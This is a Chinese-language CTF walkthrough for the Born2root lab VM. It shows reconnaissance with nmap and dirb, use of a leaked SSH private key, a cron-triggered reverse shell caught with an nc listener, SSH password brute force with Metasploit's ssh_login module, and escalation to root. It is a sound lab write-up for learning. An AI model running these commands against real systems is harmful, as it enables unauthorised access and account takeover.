Born2root-SSH服务渗透

准备工作

1. 先下载Born2root镜像并导入虚拟机，注意：本人将ova导入vmware时报了这个错误：
   

• 原因是OVFtools不兼容的问题，导入virtualbox解决问题！
  

2.安装好kali攻击机，这个自行官网下载，这里不再赘述。

漏洞复现过程

1. 使用netdiscover命令发现存活主机。

netdiscover -i eth0

• 发现目标主机，开始展开攻击！

2. 首先使用nmap对目标主机进行信息收集。

nmap -sV 192.168.101.31

• 发现目标主机开放了ssh端口和一些网络服务。有可能存在ssh私钥泄露等问题，进一步进行渗透。

3. 使用浏览器登录，进一步进行信息收集。
   

• 发现了一些有用的信息，可能是目标主机的一个账户。

4. 使用dirb工具进行WEB目录扫描，更加深入地进行信息挖掘。

dirb http://192.168.101.31/

• 发掘到一些目录信息，并尝试能不能从中找到flag信息。

• 首先先查找robots.txt文件，但是并没有发现有价值的信息。
  

• 最后打开http://192.168.101.31/icons/,发现出现了目录遍历。
  

• 打开VDSoyuAXiO.txt文件，发现了ssh的私钥加密信息。
  

5. 在命令行使用wget命令将这文件下载到桌面，并重命名为id_rsa。

wget http://192.168.101.31/icons/VDSoyuAXiO.txt

6. 将id_rsa权限更改为600

chmod 600 id_rsa

7. 然后使用该私钥尝试登陆目标系统。

ssh -i id_rsa [email protected]

• 成功登陆目标系统，但是发现martin账户并不属于root用户组，无法提权。

• 然后再进一步查看/etc/passwd目录，收集账户信息。
  

• 进入home目录后发现共有三个用户，可能可以提权。

• 再查看/etc/crontab上系统执行的周期性任务。发现jimmy账户每隔五分钟执行一遍sekurity.py文件。因此可以尝试编写py脚本反弹shell。
  

• 赋予脚本文件可执行的权限
  

8. 使用nc侦听端口，并反弹shell

nc -lvp 4444

• 发现jimmy用户也不属于root用户组，提权失败。最后剩下hadi账户。

9. hadi账户只能通过ssh口令暴力破解获取其登录密钥。
   在网上搜猜密码，并生成一个hadi.txt密码字典，保存在桌面即可。我使用过cupp生成，但是并不能成功破解，读者可以自行选择。

10. 启动msfconsole，并加载相应模块进行漏洞利用。

msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.101.31
set username hadi
set pass_file /root/Desktop/hadi.txt
set threads 5
set verbose true
run

• 等待一段时间发现密码是hadi123。尝试登陆

sessions -i 1

• 在空白处键入该命令，获取shell字符页面

python -c "import pty; pty.spawn('/bin/bash')"

11. 尝试提权，密码为hadi123

su - root

• 提权成功
  

12. 查看flag